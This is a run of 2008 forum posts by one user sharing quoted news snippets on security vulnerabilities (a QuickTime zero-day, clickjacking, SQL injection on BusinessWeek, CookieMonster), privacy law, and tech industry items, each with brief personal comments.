Topics

126

Living Room / Vuln. Alert: QuickTime/iTunes Zero-Day BOF/RCE

« on: September 19, 2008, 04:23 PM »

Amazing that these things can still happen. The exploit uses an atypically long string to cause the application crash (please note the use of "denial of service" in the second link) and potentially allow arbitrary remote code execution on the effected machine.

A hacker has released attack code that exploits an unpatched vulnerability in Apple Inc.'s QuickTime, just a week after the company updated the media player to plug nine other serious vulnerabilities, a security researcher said Wednesday.

The exploit, which was published on the milw0rm.com site Tuesday, takes advantage of a flaw in the "<? quicktime type= ?>" parameter in QuickTime, which is not prepared to handle excessively-long strings, said Aaron Adams, a researcher with Symantec Corp.'s DeepSight threat notification network.

Full Story
Full Story 2

Ehtyar.

127

Living Room / Blog Post: GPS Spoofing

« on: September 19, 2008, 04:15 PM »

A little paranoid, but poignant nonetheless. Hijackers can quite easily spoof GPS signals, permitting them to falsify signals sent to and from civilian GPS devices.

Our global society relies on the civilian GPS for our communications networks, transportation of goods, power distribution, financial transactions and emergency response, using precise location information and time synchronization. Unfortunately, the GPS system was not designed for this purpose. The civilian GPS has dangerous security vulnerabilities which now leave our global society at risk of serious disruption at any moment.

Full Blog

Ehtyar.

128

Living Room / News Article: Laptop Border Search Procedures To Be Documented

« on: September 19, 2008, 04:08 PM »

The procedures the TSA follows in conducting border searches of laptops may be made public under new legislation.

A U.S. lawmaker introduced a bill last week that would require the U.S. Department of Homeland Security to disclose its procedures for searching computers and devices at the border as well as produce a quarterly report of all laptops, devices and data seized by border agents.

The bill, titled the Border Security Search Accountability Act of 2008, would limit the length of time devices can be held by DHS agents and increase protections for corporate data stored on devices. In addition, individuals would be entitled to a receipt for their belongings, written confirmation if their data is copied and more information about dispute resolution. The DHS would also have to produce a quarterly report of the number of devices seized at different ports of entry.

Full Story

Ehtyar.

129

Living Room / News Article: EFF To Sue President and NSA

« on: September 19, 2008, 04:06 PM »

The EFF has filed suit against Dubya, The NSA and others in an attempt to prevent them spying on citizens via AT&T.

The Electronic Frontier Foundation, a pro-civil-liberties organization, announced on Thursday that it had filed a lawsuit against the National Security Agency, President George W. Bush and other individuals on behalf of AT&T customers, asking that unconstitutional surveillance stop.

The lawsuit aims to end the collection of data and wiretapping by the NSA targeting ordinary Americans and hold the architects of the various surveillance initiatives responsible for any violations of the U.S. Constitution, the EFF said in a statement. The lawsuit uses evidence already made public to make its case, since the Bush Administration has not been shy about using the state secrets privilege to quash past lawsuits. A previous lawsuit brought by the EFF against telecommunications giant AT&T is one of the only cases against the surveillance programs to have survived the government's legal tactics.

Full Story

Ehtyar.

130

Living Room / DonationQuote - DonationCoder Quote Database [Update]

« on: September 18, 2008, 07:20 PM »

Hi everyone. I have recently put together a place for everyone on DonationCoder to submit quotes from site members so that everyone can have a good laugh or read some philosophical thoughts etc. So far it is dominated by snippets of chat from the irc channel on EFNet however quotes can be submitted from any medium with relation to DonationCoder.

It currently works thus:
1. A user finds a quote they'd like to post. E.g. "<ioszilla> today's mousering threat level: ELEVATED".
2. They visit the DonationQuote website at http://quotes.dcmembers.com/.
3. They click the "Contribute" link in the upper right corner.
4. They add a title, insert the quote, and add their own nickname to the post.
5. A moderator checks their post and accepts it into the database. (any forum mods/irc regs are welcome to PM me for moderator login)
Users can see the latest submissions here and RSS with full quotes included here. If you'd like to get an idea of some of the quotes in the database I would recommending checking out a few random quotes here.
I'd like to thank Mouser for kindly hosting this project on the DCMembers website (PM Mouser or Gothi[c] for info.), Gothi[c] for setting up the account and pointing out how horribly insecure the script was (I am ashamed), and Joshua/Deo for recommending it. I'd also like to credit the RASH Quote Management System that the website is based on, along with a warning; this script should never be used on an openly accessible website. It is disastrously insecure and is used in this project only after some very laborious sanitation.
Lastly, have some laughs everyone!!

Ehtyar.

131

Living Room / Wired Gallery: Future Travel

« on: September 17, 2008, 04:07 AM »

Wired.com show artists' impressions of the future of travel.

Future worlds described by science fiction visionaries like Philip K. Dick, William Gibson and Robert Heinlein often included wildly inventive methods of transportation to other planets, galaxies and dimensions.

These brief glimpses into the possible future of travel were left largely to the readers' imaginations, but a flourishing group of dreamers, designers and illustrators are bringing those creations to life -- at least online.

Full Story

Ehtyar.

132

Living Room / News Article: Microsoft & Cray Release $25,000 Supercomputer

« on: September 17, 2008, 04:04 AM »

Microsoft and Cray have teamed up to release the worlds most affordable supercomputer.

Impulse buyers, lock your credit cards in a drawer when you're browsing Amazon.com: You might end up purchasing a $25,000 compact supercomputer on a whim.

In an effort to make supercomputers mainstream, Microsoft and Cray teamed up to produce the Cray CX1, the "most affordable super computer Cray has ever offered." Unveiled Tuesday morning, the CX1 will run a new version of Microsoft Windows on either 32 or 64 Intel cores, and the desktop will carry 4 terabytes of storage, according to a GigaOM story. 

Full Story

Ehtyar.

133

Living Room / News Article: Facebook Apps To Undergo Voluntary Validation

« on: September 17, 2008, 04:02 AM »

Users who wish to certify that their Facebook apps will not violate users' expectations will soon be able to volunteer to have them vetted by Facebook.

After booting applications from Facebook this summer for violating user privacy, the social-networking company is gearing up to vet apps for trustworthiness as part of a voluntary validation program.

The validation badge will give Facebook members a gauge to use in deciding whether to add a particular app or not. Experts praise Facebook's effort, but say apps posing security risks will still be around despite that, partly because of the popularity of the network.

Full Story

Ehtyar.

134

Living Room / Vuln. Alert: Forever21 Payment Card Breach

« on: September 17, 2008, 03:54 AM »

Forever21 has had payment card details stolen from 21 stores over a four year period.

Almost 99,000 payment cards used by people shopping at Forever 21 stores may have been lifted over a four-year period by people linked to the heist of 45.6 million payment cards from customers from stores owned by TJX Companies.

On Friday, the company issued a statement on its website that said it learned of the theft from law enforcement officials more than a month earlier. The theft took place on nine specific dates from March 2004 to August of last year as part of crimes alleged in an August 5 indictment charging 11 individuals of engaging in wholesale credit card theft against stores owned by TJX and others.

Full Story

Ehtyar.

135

Living Room / News Article: Microsoft To Teach About Secure Code

« on: September 17, 2008, 03:49 AM »

Stunningly, Microsoft apparently considers itself in a position to teach others how to code securely.

After spending four years as an internal process for designing secure programs from the ground up, Microsoft's Secure Development Lifecycle could soon go mainstream.

The company on Tuesday unveiled plans to help other organizations adopt comprehensive secure coding practices through three initiatives that will go live sometime in November. The company is billing them as a way to bring SDL practices to the development masses.

Full Story

Ehtyar.

136

Living Room / Vuln. Alert: Browser 'Clickjacking'

« on: September 17, 2008, 03:47 AM »

A vulnerability has been discovered that allegedly allows an attack to misrepresent the destination of a link on their website in order to lead the reader to a destination of the attackers choice. The details are thus far being withheld at the behest of Adobe.

In another event for the "internet is broken" files, two prominent security researchers have pulled a scheduled talk that was to demonstrate critical holes affecting anyone who uses a browser to surf the web.

Jeremiah Grossman and Robert "RSnake" Hansen say they planned to demonstrate serious "clickjacking" vulnerabilities involving every major browser during a presentation scheduled for September 24 at OWASP's AppSec 2008 Conference in New York. They canceled their talk at the request of Adobe, one of the developers whose software is vulnerable to the weakness, they say.

Full Story

Ehtyar.

137

Living Room / Vuln. Alert: BusinessWeek SQL Injection

« on: September 17, 2008, 03:43 AM »

The BusinessWeek magazine's website has suffered an attack on an SQL injection vulnerability in its pages causing it to serve up malware.

The Web site of BusinessWeek magazine suffered a major SQL injection attack in recent days that left it hosting malware on hundreds of its pages, security vendor Sophos PLC has reported.

Once compromised by such a server hole, the attack scripts could, in principle, launch anything desired by the attacker except currently included code for automatic attacks based on JavaScript. That means a visitor could be hit by malware just by landing on one of the pages, without even interacting in any way.

Full Story
Second Reference

Ehtyar.

138

Living Room / News Article: Comcast Sues FCC

« on: September 14, 2008, 05:36 AM »

Comcast is suing the FCC in relation to its recent loss in its battle to validate its interference with its customers P2P traffic.

Ever since the FCC handed down its 3-2 decision against cable operator Comcast's network management techniques, Comcast has been expected to sue the FCC. Today, the cable giant made good on those predictions, filing an appeal of the FCC ruling in the DC Court of Appeals, which has jurisdiction over FCC decisions.

The appeal itself is brief: a two-page document, a cover letter, and a $450 check. But the fight that it spawns will no doubt drag on for quite some time, centering on one major question: can the FCC rule against Comcast based on a policy statement that the FCC said was not enforceable at the time?

Full Story

Ehtyar.

139

Living Room / News Article: P2P Snoops Need PI License In Michigan

« on: September 14, 2008, 05:30 AM »

Michigan recently passed a law requiring the (arguably) biggest P2P snoop to have a private investigators license.

The RIAA's campaign against filesharers follows a standard procedure: find a computer offering files for download, get a court to force the ISP or organization that provided the computer's IP address to reveal the computer's owner, and then sue the owner. The group has contracted with MediaSentry to do the work of identifying the infringing computers, but that company's methods have been called into question in a number of states that have licensing requirements for private investigators that include the computer-based snooping required to gather the data. Michigan was one such state and, if there was any doubt about the licensing issue there, it's gone now: the state passed a law that specifically calls for computer forensics groups to be licensed.

Full Story

Ehtyar.

140

Living Room / News Article: On/Off Switch For RFID Cards

« on: September 14, 2008, 05:25 AM »

An on/off switch has been developed for RFID cards.

A U.K. firm has developed an on/off “switch” for RFID cards that could protect cardholders from being hacked. The cardholder activates the RFID transmission by squeezing the card between his thumb and forefinger when it must be scanned by a reader.

The patented polymer-based technology comprised of metal particles is embedded into a circuit and gets built into a smart card during the lamination process. When compressed, it acts as an RFID signal conductor. “The difference is that RFID is always on and being interrogated, but this is always off until the instant you want it read,” says a spokesman for Peratech, which says it’s currently in discussions with smart card vendors.

Full Story

Personal comment: Seems a little impractical to me, especially when you have the alternative of not using RFID at all staring you in the face.

Ehtyar.

141

Living Room / News Article: Anti-Spam Law Declared Unconstitutional

« on: September 14, 2008, 05:20 AM »

The Virginia Supreme Court has declared the state's anti-spam laws violate the 5th amendment.

The Virginia Supreme Court declared the state's anti-spam law unconstitutional Friday and reversed the conviction of a man once considered one of the world's most prolific spammers.

The court unanimously agreed with Jeremy Jaynes' argument that the law violates the free-speech protections of the First Amendment because it does not just restrict commercial e-mails - it restricts other unsolicited messages as well. Most other states also have anti-spam laws, and there is a federal CAN-SPAM Act as well, but those laws apply only to commercial e-mail pitches.

Full Story

Ehtyar.

142

Living Room / News Article: Firefox 3.1 To Include "Private Browsing"

« on: September 14, 2008, 05:18 AM »

Firefox 3.1 will allow users to make use of a 'private browsing' mode that will cover their online tracks.

Mozilla is jumping on the latest privacy bandwagon, with developers already working hard to ensure a new private browsing feature ships in Firefox 3.1, due to arrive at the end of 2008.

Private browsing, or “porn mode” as it’s often referred to, since that’s one of the more obvious uses, restricts the information that your browser gathers as you visit websites. Cookies are rejected, URLs are kept out of the browser history, forms are not auto-filled and pages are not cached.

Full Story

Ehtyar.

143

Living Room / News Article: YouTube Bans Terrorist Videos

« on: September 14, 2008, 05:11 AM »

YouTube has banned videos 'Intended to Incite Violence or Encourage Dangerous, Illegal Activities'.

We should all feel safer now that Google's YouTube has unveiled new guidelines that will not tolerate uploaded videos "intended to incite violence or encourage dangerous, illegal activities that have an inherent risk of serious physical harm or death."

Viewers of the popular video sharing site instead will have to use Google's search engine to find them elsewhere. Or, better yet, just turn on the boob tube and click onto any broadcast or cable network.

Full Story

Ehtyar.

144

Living Room / Vuln. Alert: Malformed URLs Crash Acrobat 9

« on: September 14, 2008, 05:03 AM »

Adobe Acrobat can suffer a denial of service or crash after being served a malformed URL.

Certain URLs can cause Adobe Acrobat 9 to suffer a denial of service or crash, says a researcher.

According to an alert from the SecuriTeam mailing list, "a vulnerability in Adobe Acrobat 9 allow attackers to cause the program to crash by providing it with a malformed URL."

Full Story

Ehtyar.

145

Living Room / Vuln. Alert: YouTube Tool Helps Spead Trojans

« on: September 14, 2008, 04:59 AM »

A new tools helps YouTubers distribute malware.

Miscreants have created a tool that dumbs down the process of using fake YouTube websites to spread malware.

The YFakeCreator tool allows budding VXers to set up a fake site and configure options such as the properties of a supposed video. Typically users are required to download a fake codec to view content, which is not actually on offer. The codec contains the malware payload which can be anything from adware to a Trojan.

The tool also includes the ability to set-up a fake error message in a bid to disguise any attack.

Full Story

Ehtyar.

146

Living Room / Vuln. Alert: "UK's Chernobyl" Spam

« on: September 14, 2008, 04:32 AM »

Spam campaign claims nuclear disaster in London, but links to malware instead.

A widespread spam campaign claims that a nuclear power plant on the outskirts of London exploded on Tuesday afternoon.

No such plant exists anywhere near London. The nearest is probably Dungeness B in south east Kent, some 77 miles (124km) by road from the capital.

The email claims to offer pictures of victims. In reality, the attached zip file is contaminated with a Trojan horse, identified by net security firm Sophos as Troj/Agent-HQE. Once the malware is installed, hackers can use it to spy on the victim's computer and steal information for financial gain.

Full Story

Ehtyar.

147

Living Room / News Article: Arizona Stops Serving Death Certs On Web

« on: September 14, 2008, 04:26 AM »

Arizona will no longer be offering copies of death certificates online amid identity theft concerns.

Arizona authorities have stopped publishing copies of death certificates on a website over concerns that the information might be used in identity theft scams.

Maricopa County - which covers the state's largest city, Phoenix - discontinued the long-standing practice of posting digital copies of death certificates last month after complaints from the general public, the Arizona Republic reports. The publication of digital certificate of death notices, which are needed to complete certain real estate transactions, was designed to reduce bureaucracy but has attracted criticism over privacy issues for years. These concerns, along with more recent ID theft worries, have prompted a rethink.

Full Story

Ehtyar.

148

Living Room / News Article: Insecure Cookies Leak Sensitive Information

« on: September 14, 2008, 04:14 AM »

Secure websites are vulnerable to a new man-in-the-middle attack that takes advantage of cookies without the secure bit set.

Websites used for email, banking, e-commerce and other sensitive applications just got even less secure with the release of a new tool that siphons users' authentication credentials - even when they're sent through supposedly secure channels.

Dubbed CookieMonster, the toolkit is used in a variety of man-in-the-middle scenarios to trick a victim's browser into turning over the authentication cookies used to gain access to user account sections of a website. Unlike an attack method known as sidejacking, it works with vulnerable websites even when a user's browsing session is encrypted from start to finish using the secure sockets layer (SSL) protocol.

Full Story

Ehtyar.

149

Living Room / News Article: Old News, Served Fresh

« on: September 14, 2008, 04:10 AM »

United Airlines has been hit on the stock market after Google news picked up a 6 year old news story and published it as current.

As reported by The Washington Post, this labyrinthine tale began on Saturday, when Google News indexed a United bankruptcy piece published by the Chicago Tribune way back in 2002. United filed for chapter 11 that December, but emerged from bankruptcy four years later.

Google insists the South Florida Sun-Sentinel - a Trib sister paper - republished the story at about 10:30pm Pacific Saturday evening. But the papers' parent company says Google bots must have pulled the piece from the Sun-Sentinel's online archive.

In any event, the story lacked a date stamp. So Google stamped it with the current date: September 6, 2008.

Full Story

Ehtyar.

150

DC Gamer Club / News Article: The Growing Perils Of Online Game Play

« on: September 14, 2008, 03:58 AM »

There appears to be a growing trend in exploitation of online game accounts.

As massively multiplayer online role playing games (MMORPGs) such as "World of Warcraft" (WoW) and virtual worlds such as Linden Labs' Second Life continue to attract millions of users, they have also begun to attract cybercriminals, according to a recent report from ESET, a software security vendor.

"Criminals follow the money trail, regardless if it's physical or not," Jeff Debrosse, director of research at ESET, told TechNewsWorld.

The security risk to online gamers has topped ESET's threat list for the past few months and the firm's statistics indicate the problem is growing.

Full Story

Ehtyar.